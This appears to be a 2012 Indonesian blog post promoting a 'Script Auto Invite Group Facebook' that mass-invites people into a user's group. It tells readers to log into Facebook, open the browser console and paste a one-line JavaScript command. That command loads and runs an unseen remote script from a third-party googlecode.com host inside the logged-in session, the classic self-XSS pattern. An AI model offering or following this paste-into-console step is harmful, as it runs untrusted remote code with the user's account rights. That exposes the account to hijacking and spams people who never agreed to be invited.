Monday, December 10, 2012

Script Auto Invite Group Facebook

 . yak,,,, bagi para facebookers yang pengen punya group dengan anggota yang beribu-ribu???? hahahahaha

Nih pakek cara ini pasti langsung deh tu group langsung banyak anggotanya..

ok langsung aja ya


  • buka browser mozilla
  • lalu login FB sobat
  • masuk ke group yang udah sobat buat 
  • lalu tekan  CTRL + SHIFT + K Pada keyboard sobat
  • lalu Copy & Paste code Ini :
document.body.appendChild(document.createElement('script')).src='http://vikrymadz.googlecode.com/files/AutoInviteGroup.js';
  • Lalu Tekan Enter .... tunggu sampai prosesnya selesei....


Gimana???? bisa gak????? klo gak bisa komentar yaaahh....
Jika berkenan, mohon bantuannya untuk memberi vote Google + untuk halaman ini dengan cara mengklik tombol G+ di samping. Jika akun Google anda sedang login, hanya dengan sekali klik voting sudah selesai. Terima kasih atas bantuannya.
Judul: Script Auto Invite Group Facebook; Ditulis oleh Aditya Ef-Venom Phan tom; Rating Blog: 5 dari 5

No comments:

Post a Comment